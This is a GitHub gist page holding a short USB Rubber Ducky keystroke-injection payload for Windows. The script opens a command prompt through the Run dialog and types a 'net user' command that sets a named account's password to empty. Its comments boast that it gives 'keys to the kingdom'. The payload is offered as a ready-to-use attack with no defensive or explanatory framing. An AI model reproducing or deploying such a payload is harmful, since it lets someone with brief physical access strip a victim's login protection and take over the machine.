Skip to content

Instantly share code, notes, and snippets.

@JonnyBanana
Created April 17, 2018 04:55
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save JonnyBanana/79880da234ec476ad1225c93a74ec93d to your computer and use it in GitHub Desktop.
Save JonnyBanana/79880da234ec476ad1225c93a74ec93d to your computer and use it in GitHub Desktop.
REM This payload will remove the current users password on windows and give you keys to the kingdom
GUI r
STRING cmd
ENTER
DELAY 500
REM It is important that you change to the target username below, will continue to work on copy/pasting from cmd prompt
STRING net user USERNAME HERE ""
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment